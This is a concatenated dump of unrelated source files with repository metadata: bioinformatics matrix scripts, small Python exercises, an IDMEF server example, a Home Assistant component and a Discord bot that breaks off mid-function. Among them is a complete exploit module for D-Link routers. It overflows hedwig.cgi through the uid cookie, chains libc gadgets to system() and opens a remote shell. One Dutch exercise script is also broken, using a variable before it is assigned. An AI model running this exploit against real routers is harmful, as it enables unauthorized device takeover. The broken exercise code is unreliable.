a09341c86e8173d91eda01c6d82ec77bb981f957 | ccdf3dffdc390b774ac3e6ba81c16dc48bc9a5fb | /notebooks/fct_network_functions.py | c5fd019ef04e663aa144ce32b34847f62fcc8c07 | [] | no_license | CCSB-DFCI/HuRI_paper | 90a69521e41d2a8dad9987895930ecd0ce6504b6 | 16c57919f4e0c3d1a78edf90c105ed42d3022f8f | refs/heads/master | 2022-12-15T19:58:33.625633 | 2020-09-14T17:07:06 | 2020-09-14T17:07:06 | 226,145,775 | 25 | 8 | null | 2022-08-23T18:07:00 | 2019-12-05T16:38:19 | Jupyter Notebook | UTF-8 | Python | false | false | 8,715 | py | # script that contains code to generate functional profile matrices, some other scripts to process functional
# annotation data and some code to facilitate analysis and plotting of data by doing some pre-calculations
import numpy
import os
import sys
import pandas
import database_utils
# function that generates a matrix of all proteins in HuRI by all proteins in HuRI with their pairwise
# seq similarity
def generate_seq_similarity_matrix(cursor,path,outfile):
    """Write a gene-by-gene sequence-identity matrix for HuRI proteins.

    Maps ORF IDs to Ensembl gene IDs via the database, reads the pairwise
    MUSCLE alignment file, keeps the maximum identity per gene pair, and
    writes a symmetric tab-separated matrix (diagonal/unseen pairs are 1.0
    because the matrix is initialised with ones).
    """
    print('get a mapping file between orf ids and gene ids')
    orf_gene_map_dict = {}
    query = """select distinct orf_id,ensembl_gene_id
            from horfeome_annotation_gencode27.orf_class_map_ensg
            where orf_class in ("pcORF","npcORF")"""
    cursor.execute(query)
    for row in cursor:
        orf_id = str(row[0])
        # Strip the Ensembl version suffix (ENSG...\.N -> ENSG...).
        gene_id = row[1].split('.')[0]
        if orf_id not in orf_gene_map_dict:
            orf_gene_map_dict[orf_id] = []
        orf_gene_map_dict[orf_id].append(gene_id)
    print('read in the alignment file and map to gene IDs')
    seq_align_dict = {}
    file1 = open(path + 'hi2018_paper.muscle_alignment.txt','r')
    count = 0
    for line in file1:
        tab_list = str.split(line[:-1],'\t')
        orf_id1 = tab_list[0]
        orf_id2 = tab_list[1]
        # Skip the header row ('orf_id1' in the first column).
        if orf_id1 != 'orf_id1':
            # identity = matching positions / alignment length.
            seq_ident = float(tab_list[2])/float(tab_list[6])
            if orf_id1 in orf_gene_map_dict and orf_id2 in orf_gene_map_dict:
                for gene_a in orf_gene_map_dict[orf_id1]:
                    for gene_b in orf_gene_map_dict[orf_id2]:
                        pair = tuple(sorted([gene_a,gene_b]))
                        if pair not in seq_align_dict:
                            seq_align_dict[pair] = 0
                        # Several ORF pairs can map to the same gene pair;
                        # keep the highest identity.
                        seq_align_dict[pair] = max(seq_align_dict[pair],seq_ident)
        count += 1
        if count % 100000 == 0:
            print(count)
    file1.close()
    print('get all gene ids')
    gene_ids = sorted(list(set([tup[0] for tup in seq_align_dict.keys()] + [tup[1] for tup in seq_align_dict.keys()])))
    print('create a matrix of seq similarities')
    matrix = numpy.ones((len(gene_ids),len(gene_ids)),dtype=float)
    # NOTE(review): gene_ids.index() is O(n) per lookup inside this loop;
    # a precomputed id->index dict would be faster for large gene sets.
    for pair,seq_ident in seq_align_dict.items():
        index_a = gene_ids.index(pair[0])
        index_b = gene_ids.index(pair[1])
        matrix[index_a,index_b] = seq_ident
        matrix[index_b,index_a] = seq_ident
    print('write out the matrix')
    target = open(outfile,'w')
    target.write('\t' + '\t'.join(gene_ids) + '\n')
    for i in range(len(gene_ids)):
        target.write(gene_ids[i] + '\t' + '\t'.join([str(v) for v in matrix[i,]]) + '\n')
    target.close()
# function that processes the co-fitness profile matrix by mapping it to Ensembl gene IDs and dealing with
# changes to the dataset because of the mapping
def map_co_fitness_matrix_to_gene_ids(cursor,co_fitness_matrix_file,outfile):
    """Rewrite a co-fitness matrix keyed by gene symbols to Ensembl gene IDs.

    Rows/columns whose symbol cannot be mapped are dropped from the output;
    the matrix stays square over the mapped subset.
    """
    # get a mapping dict between gene symbols and gene IDs
    query = """select distinct ensembl_gene_id_short,symbol from horfeome_annotation_gencode27.gencode2entrez"""
    cursor.execute(query)
    symbol_id_map_dict = {}
    for row in cursor:
        gene_id = row[0]
        symbol = row[1]
        symbol_id_map_dict[symbol] = gene_id
    # Read only the header row to get the column symbols.
    # NOTE(review): file1 is never closed -- harmless for a one-shot script
    # but worth wrapping in a context manager.
    file1 = open(co_fitness_matrix_file,'r')
    for line in file1:
        gene_names = line[:-1].split('\t')[1:]
        break
    matrix = numpy.loadtxt(co_fitness_matrix_file,dtype='float',delimiter='\t',skiprows=1,usecols=range(1,len(gene_names)+1))
    gene_ids = []
    indices = []
    # gene_ids is positional (None for unmapped symbols); indices keeps the
    # matrix positions of the mapped ones.
    for i,gene_name in enumerate(gene_names):
        if gene_name in symbol_id_map_dict:
            gene_ids.append(symbol_id_map_dict[gene_name])
            indices.append(i)
        else:
            gene_ids.append(None)
    target = open(outfile,'w')
    target.write('\t' + '\t'.join(filter(lambda v: v is not None,gene_ids)) + '\n')
    for i in indices:
        target.write(gene_ids[i] + '\t' + '\t'.join([str(matrix[i,v]) for v in indices]) + '\n')
    target.close()
# function that reads in the files from SEEK DB to generate one PCC matrix restricted to proteins in HI-union
def generate_SEEK_matrix(SEEK_path,cursor,outfile_prefix):
    """Build a symmetric PCC co-expression matrix from per-gene SEEK files.

    Restricts the matrix to HI-union genes (from the database), maps Entrez
    gene IDs to Ensembl IDs, then fills a gene-by-gene matrix from the
    per-gene correlation files in *SEEK_path*. Writes both a tab-separated
    text matrix and a numpy .npy binary, named from *outfile_prefix*.
    """
    # get the set of genes to be included in the expression matrix
    query = """select distinct a.ensembl_gene_id from
            horfeome_annotation_gencode27.orf_class_map_ensg a,
            horfeome_annotation_gencode27.gencode_transcript_annotation b,
            (select distinct ad_orf_id orf_id from hi_ref_retest.retest where standard_batch in ("Hs15","Hs14") and final_score="1"
            union
            (select distinct db_orf_id from hi_ref_retest.retest where standard_batch in ("Hs15","Hs14") and final_score="1")) as c
            where a.in_new_space_3=1 and a.orf_class='pcORF' and a.ensembl_gene_id=b.ensembl_gene_id and b.gene_type="protein_coding" and a.orf_id=c.orf_id
            union
            (select distinct a.ensembl_gene_id from
            (select interactor_a ensembl_gene_id from
            hi_ref.huri_exp_info
            union
            (select interactor_b from
            hi_ref.huri_exp_info
            )) as a,
            horfeome_annotation_gencode27.gencode_transcript_annotation b,
            horfeome_annotation_gencode27.orf_class_map_ensg c
            where a.ensembl_gene_id=b.ensembl_gene_id and b.gene_type='protein_coding' and a.ensembl_gene_id=c.ensembl_gene_id and c.orf_class='pcORF')"""
    cursor.execute(query)
    huri_genes = set([row[0].split('.')[0] for row in cursor])
    print('Number of HI-union genes:', len(huri_genes))
    # get a mapping between gene IDs and Ensembl gene ids
    query = """select distinct entrez_gene_id,ensembl_gene_id_short from horfeome_annotation_gencode27.gencode2entrez"""
    cursor.execute(query)
    map_dict = {}
    for row in cursor:
        map_dict[str(row[0])] = row[1]
    print('Number of geneIDs mapped to Ensg IDs:', len(map_dict))
    # get set of gene IDs used in SEEK as intersection between file names and row names in one file and map those to ensemble gene ids
    files = os.listdir(SEEK_path)
    gene_ids = set([s.split('.')[0] for s in files])
    # NOTE(review): this handle is never closed; wrap in a context manager.
    file1 = open(SEEK_path + files[0],'r')
    entries = file1.readlines()
    gene_ids = list(gene_ids.intersection(set([line.split('\t')[0] for line in entries])))
    matched_gene_ids = []
    matched_ensg_ids = []
    # Keep only IDs that map to an HI-union Ensembl gene, de-duplicating
    # Entrez IDs that map to the same Ensembl gene.
    for gene_id in gene_ids:
        if gene_id in map_dict and map_dict[gene_id] in huri_genes and map_dict[gene_id] not in matched_ensg_ids:
            matched_gene_ids.append(gene_id)
            matched_ensg_ids.append(map_dict[gene_id])
    print('Number of retained ensg IDs:', len(matched_ensg_ids))
    # get a dict that maps from gene ID to index in matrix
    id_index_dict = dict([(matched_gene_ids[i],i) for i in range(len(matched_gene_ids))])
    # fill a matrix with the PCCs for the selected list of gene IDs
    print('Start filling the PCC matrix')
    matrix = numpy.zeros((len(matched_ensg_ids),len(matched_ensg_ids)),dtype=float)
    for f,file_name in enumerate(files):
        if f % 1000 == 0:
            print(f)
        gene_a = file_name.split('.')[0]
        if gene_a in id_index_dict:
            file1 = open(SEEK_path + file_name,'r')
            entries = file1.readlines()
            file1.close()
            for line in entries:
                tab_list = str.split(line[:-1],'\t')
                gene_b = tab_list[0]
                pcc = float(tab_list[1])
                if gene_b in id_index_dict:
                    # Write both (a,b) and (b,a) so the matrix is symmetric.
                    matrix[id_index_dict[gene_a],id_index_dict[gene_b]] = pcc
                    matrix[id_index_dict[gene_b],id_index_dict[gene_a]] = pcc
    # write out
    print('Write text')
    outfile_text = outfile_prefix + '.txt'
    target = open(outfile_text,'w')
    target.write('\t' + '\t'.join(matched_ensg_ids) + '\n')
    for i in range(len(matched_ensg_ids)):
        target.write(matched_ensg_ids[i] + '\t' + '\t'.join([str(v) for v in matrix[i,:]]) + '\n')
    target.close()
    print('Write binary')
    outfile_binary = outfile_prefix + '.npy'
    numpy.save(outfile_binary,matrix)
def count_edges_per_cutoff(nw_name,num_rand,inpath,outpath):
    """Count, per randomized network, the edges passing each Jaccard-similarity cutoff.

    Reads <inpath>/<nw_name>/<nw_name>_rand_network_<r>.txt for
    r in 0..num_rand-1 and saves a (num_rand x num_cutoffs) int matrix
    as a numpy .npy file in *outpath*.
    """
    # Cutoffs: 0.001, 0.01, then 0.1 .. 1.0 in steps of 0.1.
    cutoffs = [0.001,0.01] + [i/10.0 for i in range(1,11)]
    count_matrix = numpy.zeros((num_rand,len(cutoffs)),dtype='int')
    for r in range(num_rand):
        # Progress indicator every 10 networks.
        if r % 10 == 0:
            print(r)
        network_file = inpath + nw_name + '/' + nw_name + '_rand_network_' + str(r) + '.txt'
        PSN = pandas.read_table(network_file,header=0)
        for c,cutoff in enumerate(cutoffs):
            count_matrix[r][c] = PSN.loc[PSN['Jaccard_similarity'] >= cutoff,].shape[0]
    outfile = outpath + nw_name + '_rand_edge_count_per_JScutoff.npy'
    numpy.save(outfile,count_matrix)
if __name__ == '__main__':
    # Command-line dispatcher: sys.argv[1] selects which matrix to build.
    connect = database_utils.get_connection()
    cursor = connect.cursor()
    path = '../data/katjas_data/PSN_analysis/'
    mode = sys.argv[1]
    if mode == '1':
        # Pairwise protein sequence-similarity matrix.
        outfile = path + 'seq_similarity_matrix.txt'
        generate_seq_similarity_matrix(cursor,path,outfile)
    elif mode == '2':
        # Co-fitness matrix remapped to Ensembl gene IDs.
        co_fitness_matrix_file = path + 'avana_2017_dep_corr.tsv'
        outfile = path + 'avana_2017_dep_corr_ENSG_ID.tsv'
        map_co_fitness_matrix_to_gene_ids(cursor,co_fitness_matrix_file,outfile)
    elif mode == '4':
        # Co-expression (SEEK PCC) matrix. NOTE(review): modes '3' and '5'
        # are not handled in this chunk -- presumably removed or elsewhere.
        SEEK_path = path + 'results.human.single.gene.cor/'
        outfile_prefix = path + 'SEEK_matrix'
        generate_SEEK_matrix(SEEK_path,cursor,outfile_prefix)
    elif mode == '6':
        # Edge counts per Jaccard-similarity cutoff over randomized networks.
        nw_name = sys.argv[2]
        num_rand = int(sys.argv[3])
        inpath = path
        outpath = path
        count_edges_per_cutoff(nw_name,num_rand,inpath,outpath)
| [
"lambourne.luke@gmail.com"
] | lambourne.luke@gmail.com |
d9d02a33af01468509cdfe45de0709bdd35a6768 | 9788072f75865aef11a5d0e67020a47b61793486 | /BMI.py | 7ec8854786520d112c8cf4203507b491e3ac0243 | [] | no_license | lokalawashington/-animated-spork-100daysofpython- | d7767a77343dbd0c8d83981d89231b9f7557dda9 | f421ecac04a02d6c7b2a32f5136f17ed1f10c9f7 | refs/heads/master | 2023-04-17T09:30:31.686749 | 2021-05-12T13:27:51 | 2021-05-12T13:27:51 | 366,038,636 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | height = input("Enter your height in m: ")
weight = input("Enter your weight in kg: ")
height_new = float(height)
weight_new = int(weight)
BMI = (weight_new/(height_new * height_new))
print(BMI)
BMI_as_int = int(BMI)
print(BMI_as_int)
| [
"lokalawashington2019@gmail.com"
] | lokalawashington2019@gmail.com |
3fcf0c4d584831096040e3c3b747ff1a31794a01 | c329260e4bd92fc177dac49fec9da0a121751e7e | /examples/http/server.py | d8244b3ec1ebfb96cf44fdeac4ae9e150aa9c58f | [
"BSD-2-Clause"
] | permissive | SECEF/python-idmefv2-examples | 2d2ec851bb90bea47cd9a4b59d30aaabb18241a8 | 719b7d78032bc62b4da292db108ecedb70128019 | refs/heads/main | 2023-08-03T03:53:42.476532 | 2021-09-20T15:01:14 | 2021-09-20T15:03:03 | 355,274,002 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright (C) 2021 CS GROUP - France. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
import sys
import tempfile
from args import parse_args
from idmefv2_transport import get_transport
from os.path import dirname, join
from queue import Queue, Empty
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
def main(args):
    """Start an IDMEFv2 HTTP transport and wait up to 30 s for one message.

    Prints the command line needed to launch the matching client, then
    exits with status 1 if no message arrives within the timeout.
    """
    queue = Queue()
    transport = get_transport('http://%s/' % args.address, queue, args.mime)
    transport.start()
    # The transport chooses the actual bind address/port; echo it so the
    # user can pass it to the client.
    address = "%s:%d" % transport.get_parameter('server_address')
    print("READY - You may now start the client like so:", flush=True)
    print("\t", sys.executable, join(dirname(__file__), "client.py"), *sys.argv[1:], "--address", address, flush=True)
    try:
        message = queue.get(timeout=30)
    except Empty:
        print("No message received", file=sys.stderr)
        sys.exit(1)
    else:
        print("OK:", message)
        queue.task_done()
    finally:
        # Always stop the transport, even on timeout / sys.exit.
        transport.stop()
    queue.join()
if __name__ == '__main__':
    args = parse_args("server")
    # If no working directory was given, run inside a throwaway temporary
    # directory that is cleaned up automatically when main() returns.
    if args.tmpdir is None:
        with tempfile.TemporaryDirectory() as tmpdir:
            args.tmpdir = tmpdir
            main(args)
    else:
        main(args)
| [
"francois.poirotte@csnovidys.com"
] | francois.poirotte@csnovidys.com |
f7721c25cf493ef1ded4213a2d67b41a3474dcfc | 14b5679d88afa782dc5d6b35878ab043089a060a | /students/贾帅杰/home0529/hachina5.py | 36d8ba5bc9fbfdee8285432c97c1d565fbda2281 | [] | no_license | mutiangua/EIS2020 | c541ef32623f67f9277945cd39cff3c02f06e4dd | 92aa2711b763a2c93be238825c445bf2db8da391 | refs/heads/master | 2022-11-18T05:21:47.567342 | 2020-07-11T10:11:21 | 2020-07-11T10:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,617 | py | # 引入datetime库用于方便时间相关计算
from datetime import timedelta
import logging
import voluptuous as vol
# 引入HomeAssitant中定义的一些类与函数
# track_time_interval是监听时间变化事件的一个函数
from homeassistant.helpers.event import track_time_interval
import homeassistant.helpers.config_validation as cv
DOMAIN = "hachina5"
ENTITYID = DOMAIN + ".hello_world"
CONF_STEP = "step"
DEFAULT_STEP = 3
#f=open("C:\\Users\\23004\\AppData\\Roaming\\.homeassistant\\custom_components\\num.txt", "r")
# 定义时间间隔为3秒钟
TIME_BETWEEN_UPDATES = timedelta(seconds=1)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
# 一个配置参数“step”,只能是正整数,缺省值为3
vol.Optional(CONF_STEP, default=DEFAULT_STEP): cv.positive_int,
}),
},
extra=vol.ALLOW_EXTRA)
def setup(hass, config):
    """Called by Home Assistant once the configuration file is loaded.

    (Translated from the original Chinese docstring.)
    """
    conf = config[DOMAIN]
    step = conf.get(CONF_STEP)
    _LOGGER.info("Get the configuration %s=%d",
                 CONF_STEP, step)
    # Static attributes shown for the entity in the HA frontend.
    attr = {"icon": "mdi:yin-yang",
            "friendly_name": "Door",
            "slogon": "积木构建智慧空间!",
            "unit_of_measurement": ""}
    # Construct the GrowingState helper; it registers the entity itself.
    GrowingState(hass, step, attr)
    return True
class GrowingState(object):
    """Holds the entity's state and attributes, refreshing the state periodically."""

    def __init__(self, hass, step, attr):
        """Initialise with the hass instance, the step size and the attribute dict."""
        self._hass = hass
        self._step = step
        self._attr = attr
        self._state = 0
        # Publish the initial state as soon as the object is created.
        self._hass.states.set(ENTITYID, self._state, attributes=self._attr)
        # Re-run update() every TIME_BETWEEN_UPDATES.
        track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES)

    def update(self, now):
        """Periodic callback: read the file content and publish it as the new state."""
        # Use a context manager so the handle is closed on every call
        # (the original opened the file each tick and never closed it,
        # leaking one file descriptor per update).
        with open("C:\Apache24\htdocs\\index.html", "r") as f:
            data = f.read()
        _LOGGER.info("GrowingState is "+data)
        # Keep incrementing the internal counter by the configured step,
        # as the original did (the counter itself is not published).
        self._state = self._state + self._step
        self._hass.states.set(ENTITYID, data, attributes=self._attr)
| [
"noreply@github.com"
] | noreply@github.com |
29034d4f7c58604dbb015618f3e88de8331a7636 | 5f01de2a024c21323d6c6f02be114edf45ba0775 | /Lessen/oude opdrachten/Les 2/final assignmenst 2.py | f684d0d37aa176384dc874727f78e2a58bb4632d | [] | no_license | KishanSewnath/Python | 03bd8dd11fde9fad9095773a36cfe81a5b310c96 | fe2723205cb331f9532c288ee373eba8779dffbf | refs/heads/master | 2021-05-03T11:27:51.262623 | 2016-11-02T12:50:26 | 2016-11-02T12:51:22 | 69,969,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | lst = ['aap', 'noot', 'mies', 'blaa', 'fooo', 'bar', 'bnb']
beginIndex = 3
eindIndex = 6
totaal = 0
for indexWoord in range(beginIndex, eindIndex + 1):
lengteWoord = len(woord)
woord = lst[indexWoord ]
totaal = totaal + lengteWoord
print(woord)
print(totaal)
| [
"kishan.sewnath@student.hu.nl"
] | kishan.sewnath@student.hu.nl |
c23dd5e12ae719e7b4616d5f20ac6bbd59a2fadb | 4073f351551c2f73c5659cb3038a68360cc5b369 | /Lärobok/kap 6/kap. 6, sid. 76 - sätta ihop strängar.py | a6ec6841d16836e6f2de9f964e810fd69f375383 | [
"MIT"
] | permissive | Pharou/programmering1python | b9a5aca72354d3e7e91a5023a621d22a962ecd7c | 9b689027db1f7fbf06925f3094fcb126880453e4 | refs/heads/master | 2022-11-28T06:33:17.295157 | 2020-07-25T11:02:07 | 2020-07-25T11:02:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | #!/usr/bin/python3.8
# Filnamn: kap. 6, sid. 76 - sätta ihop strängar.py
# Programmering 1 med Python - Lärobok
# Kapitel 6 - Mer om teckensträngar i Python
# Med plustecken kan du slå samman flera strängar till en enda.
# Det kallas även konkatenering av strängar
fn = 'Tage'
ln = 'Test'
name = fn + ln
print(name)
# As you can see, no space is printed by the first print statement;
# you have to insert it manually yourself.
name = fn + ' ' + ln
print(name)
# Strings are repeated with the multiplication operator *.
print(3 * 'Hola!')
print(15 * '-')
"niklas_engvall@hotmail.com"
] | niklas_engvall@hotmail.com |
d1dd96e68af28543c90ca88f0a73aba302923913 | e824b1a37f72bfc182007217294e162f1317315c | /warmpup/lonely_integer/lonely.py | 5c28ae428658a561b9a33ab080f875e153ed57dd | [] | no_license | guiambros/hackerrank | 6428d1c78ada4d04bcd0e1f495edfa0bdc411d83 | 5ff5231526a1929fac993ca03ab231cbb4c5f300 | refs/heads/master | 2021-01-25T04:50:27.601947 | 2015-02-16T06:37:35 | 2015-02-16T06:37:35 | 30,397,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | #!/usr/bin/python
# There are N integers in an array A. All but one integer occur in pairs. Your task is to find out the number that occurs only once.
#
# The first line of the input contains an integer N indicating the number of integers.
# The next line contains N space separated integers that form the array A.
#
# Output S, the number that occurs only once.
import sys
# Toggle to read input from 'input.txt' instead of stdin while developing.
DEBUG = False
if (DEBUG): fp=open('input.txt')
def print_debug(str):
    # NOTE(review): the parameter shadows the builtin str(); this script
    # uses Python 2 print-statement syntax throughout.
    if (DEBUG): print "DEBUG: " + str
    return
def read_input():
    # Read one whitespace-separated line of integers: from the debug file
    # when DEBUG is set, from stdin otherwise. (Python 2: map returns a list.)
    if (DEBUG):
        ret=map(int, fp.readline().split(' '))
    else:
        ret=map(int, sys.stdin.readline().split(' '))
    return ret
def main():
    """Read N and the array, then print the value that occurs exactly once.

    Per the problem statement at the top of this file, every value except
    one occurs in pairs, so XOR-ing all elements cancels the pairs and
    leaves the lonely integer. This is O(n) time and O(1) space, and it
    replaces the Python-2-only ``d.keys()[d.values().index(1)]`` indexing
    of the original (print() works on both Python 2 and 3).
    """
    N = read_input()
    A = read_input()
    lonely = 0
    for value in A:
        lonely ^= value
    print(lonely)
if __name__ == '__main__':
main()
| [
"gui@wrgms.com"
] | gui@wrgms.com |
2c5bad20f3963b0a05c987b18b93b70740c5217f | 543e4a93fd94a1ebcadb7ba9bd8b1f3afd3a12b8 | /maza/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py | cda6380b6efab9cd5609c5c1aeab67de8cb19247 | [
"MIT"
] | permissive | ArturSpirin/maza | e3127f07b90034f08ff294cc4afcad239bb6a6c3 | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | refs/heads/master | 2020-04-10T16:24:47.245172 | 2018-12-11T07:13:15 | 2018-12-11T07:13:15 | 161,144,181 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,810 | py | import struct
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """Remote code execution against D-Link's hedwig.cgi.

    An oversized ``uid`` cookie overflows a stack buffer in the CGI binary;
    the overwritten saved registers pivot through hard-coded libc gadget
    offsets to reach system() with an attacker-supplied command string.
    """
    __info__ = {
        "name": "D-Link Hedwig CGI RCE",
        "description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, "
                       "which leads to remote code execution.",
        "authors": (
            "Austin <github.com/realoriginal>",  # routersploit module
        ),
        "references": (
            "http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
            "http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
            "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt",
            "https://www.exploit-db.com/exploits/27283/",
        ),
        "devices": (
            "D-Link DIR-645 Ver. 1.03",
            "D-Link DIR-300 Ver. 2.14",
            "D-Link DIR-600",
        ),
    }
    # Module options exposed to the framework user.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    def run(self):
        # Verify exploitability first, then drop an interactive shell by
        # echoing a MIPS-LE payload binary to /tmp and executing it.
        if self.check():
            print_success("Target is vulnerable")
            shell(self, architecture="mipsle", method="echo", location="/tmp",
                  echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
        else:
            print_error("Target is not vulnerable")
    def execute(self, cmd):
        # Build the overflow payload and run *cmd* on the device, returning
        # whatever output follows the closing </hedwig> tag.
        cmd = cmd.encode("utf-8")
        # Gadget addresses for the vulnerable firmware's libc mapping.
        # NOTE(review): offsets are device/firmware specific — confirm they
        # match the targeted build before relying on them.
        libcbase = 0x2aaf8000
        system = 0x000531FF
        calcsystem = 0x000158C8
        callsystem = 0x000159CC
        # 973 filler bytes reach the saved return address; the random text
        # between gadgets pads the stack frames consumed by each pivot.
        shellcode = utils.random_text(973).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + system)
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + callsystem)
        shellcode += utils.random_text(12).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + calcsystem)
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += cmd
        # The payload travels in the 'uid' cookie parsed by hedwig.cgi.
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": b"uid=" + shellcode + b";"
        }
        data = {
            utils.random_text(7): utils.random_text(7)
        }
        response = self.http_request(
            method="POST",
            path="/hedwig.cgi",
            headers=headers,
            data=data,
        )
        if response is None:
            return ""
        return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
    @mute
    def check(self):
        # Echo a random marker through the exploit path; seeing it in the
        # response proves command execution.
        fingerprint = utils.random_text(10)
        cmd = "echo {}".format(fingerprint)
        response = self.execute(cmd)
        if fingerprint in response:
            return True
        return False
| [
"a.spirin@hotmail.com"
] | a.spirin@hotmail.com |
adf39be48cd84696b0a4931048eca7f235b9f4cb | 9ba2de52538216c2ee3636c199ce04d2352d9b68 | /main.py | 98939b1e5646a98a4874424ab59f9c4c4a13762d | [] | no_license | manncodes/ace-bot | f8a5d3f07b268e0323432f18da0574a8a811436a | 8d132ac6a77634b130499cd5fa39a1cdad3b92f3 | refs/heads/main | 2023-06-05T12:53:43.516320 | 2021-06-29T15:21:54 | 2021-06-29T15:21:54 | 381,407,004 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,772 | py | import discord
import os
import random
import requests
import sys
import threading
import time
import yaml
sys.path.append("./objection_engine")
from deletion import Deletion
from discord.ext import commands, tasks
from message import Message
from objection_engine.beans.comment import Comment
from objection_engine.renderer import render_comment_list
from render import Render, State
from typing import List
# Global Variables:
renderQueue = []    # pending Render jobs, consumed by the worker thread/loops
deletionQueue = []  # feedback messages scheduled for delayed deletion
def loadConfig():
    """Populate the token/prefix/deletionDelay globals from config.yaml.

    Returns True on success; prints the problem and returns False otherwise.
    """
    try:
        with open("config.yaml") as file:
            config = yaml.load(file, Loader=yaml.FullLoader)
            global token, prefix, deletionDelay
            # NOTE(review): .strip() assumes every value is a string — a bare
            # integer deletionDelay in the YAML would raise AttributeError here
            # (caught below and reported as a generic failure).
            token = config["token"].strip()
            if not token:
                raise Exception("The 'token' field is missing in the config file (config.yaml)!")
            prefix = config["prefix"].strip()
            if not prefix:
                raise Exception("The 'prefix' field is missing in the config file (config.yaml)!")
            deletionDelay = config["deletionDelay"].strip()
            if not deletionDelay:
                raise Exception("The 'deletionDelay' field is missing in the config file (config.yaml)!")
            return True
    except KeyError as keyErrorException:
        print(f"The mapping key {keyErrorException} is missing in the config file (config.yaml)!")
    except Exception as exception:
        print(exception)
    return False
# Abort start-up entirely when the config cannot be read.
if not loadConfig():
    exit()
# NOTE(review): discord.py expects the lowercase keyword 'intents='; a
# capitalized 'Intents=' is likely ignored — confirm against the library version.
courtBot = commands.AutoShardedBot(command_prefix=prefix, Intents=discord.Intents.default())
# Default 'help' command is removed, we will make our own
courtBot.remove_command("help")
currentActivityText = f"{prefix}help"
async def changeActivity(newActivityText):
    """Update the bot's presence text, skipping the API call when unchanged."""
    global currentActivityText
    if currentActivityText == newActivityText:
        return
    try:
        await courtBot.change_presence(activity=discord.Game(newActivityText))
        currentActivityText = newActivityText
        print(f"Activity was changed to {currentActivityText}")
    except Exception as exception:
        print(f"Error: {exception}")
def addToDeletionQueue(message: discord.Message):
    """Schedule *message* for deletion when the configured delay is positive."""
    delay = int(deletionDelay)
    if delay > 0:
        deletionQueue.append(Deletion(message, delay))
@courtBot.event
async def on_message(message):
    # Ignore the bot's own messages and any other bot accounts.
    if message.author is courtBot.user or message.author.bot:
        return
    # Refuse direct messages with a pointer to the support server.
    if message.channel.type is discord.ChannelType.private:
        embedResponse = discord.Embed(description="I won't process any messages via PM.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0xff0000)
        await message.channel.send(embed=embedResponse)
        return
    # Everything else goes through the normal command dispatcher.
    await courtBot.process_commands(message)
@courtBot.command()
async def help(context):
    """Custom replacement for the removed default help command."""
    # Random message count just to make the example line look concrete.
    dummyAmount = random.randint(2, 150)
    # NOTE(review): 'footer' is not an Embed constructor keyword in discord.py —
    # this argument is likely dropped silently; confirm against the library.
    helpEmbed = discord.Embed(description="Discord bot that turns message chains into ace attorney scenes.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0x3366CC, footer="Do not include these symbols (\"<\" and \">\") when using this command")
    helpEmbed.set_author(name=courtBot.user.name, icon_url=courtBot.user.avatar_url)
    helpEmbed.add_field(name="How to use?", value=f"`{prefix}render <number_of_messages>`", inline=False)
    helpEmbed.add_field(name="Example", value=f"Turn the last {dummyAmount} messages into an ace attorney scene: `{prefix}render {dummyAmount}`", inline=False)
    helpEmbed.add_field(name="Starting message", value="By default the bot will load the specified number of messages from the last message (before using the command) going backwards, if you want the message count to start from another message, reply to it when using the command.", inline=False)
    helpMessage = await context.send(embed=helpEmbed)
    # Help responses are cleaned up after the configured delay.
    addToDeletionQueue(helpMessage)
# This command is only for the bot owner, it will ignore everybody else
@courtBot.command()
@commands.is_owner()
async def queue(context):
    """Dump the current render queue to queue.txt and upload it to the channel."""
    filename = "queue.txt"
    with open(filename, 'w', encoding="utf-8") as queue:
        global renderQueue
        renderQueueSize = len(renderQueue)
        queue.write(f"There are {renderQueueSize} item(s) in the queue!\n")
        for positionInQueue, render in enumerate(iterable=renderQueue):
            queue.write(f"\n#{positionInQueue:04}\n")
            # Each field is best-effort: a job in a weird state must not
            # abort the whole dump, hence the per-line try/except guards.
            try: queue.write(f"Requested by: {render.getContext().author.name}#{render.getContext().author.discriminator}\n")
            except: pass
            try: queue.write(f"Number of messages: {len(render.getMessages())}\n")
            except: pass
            try: queue.write(f"Guild: {render.getFeedbackMessage().channel.guild.name}\n")
            except: pass
            try: queue.write(f"Channel: #{render.getFeedbackMessage().channel.name}\n")
            except: pass
            try: queue.write(f"State: {render.getStateString()}\n")
            except: pass
    await context.send(file=discord.File(filename))
    # Reuse clean() with an empty thread just to delete the temp file.
    clean([], filename)
@courtBot.command()
async def render(context, numberOfMessages: int):
    """Queue an Ace Attorney render of the last *numberOfMessages* messages.

